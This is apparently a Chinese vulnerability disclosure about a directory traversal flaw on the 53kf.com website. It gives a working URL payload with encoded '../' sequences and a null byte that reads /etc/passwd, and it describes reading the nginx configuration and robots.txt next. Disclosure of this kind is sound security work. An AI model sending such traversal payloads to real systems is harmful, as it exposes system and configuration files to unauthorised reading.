### 简要描述:
听说你们很给力啊,先试试水。
### 详细说明:
存在漏洞的地址为:
http://www.53kf.com/?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00login
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201501/18221952ee885234fcb6f3f7034345ea1e2dab5d.jpg" alt="53kf.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/18221952ee885234fcb6f3f7034345ea1e2dab5d.jpg)
成功猜到了nginx的配置文件,如下:
[<img src="https://images.seebug.org/upload/201501/182238087582c1c3b724291f746065051c138a0d.jpg" alt="53kf_nginx.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/182238087582c1c3b724291f746065051c138a0d.jpg)
得到了网站根路径,读个robots.txt试试看
[<img src="https://images.seebug.org/upload/201501/18223840f163b88a2cdb40f393f64a7a4fd6e08d.jpg" alt="53kf_robots.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/18223840f163b88a2cdb40f393f64a7a4fd6e08d.jpg)
那么是不是可以代码审计了呢
京公网安备 11010502034610号
暂无评论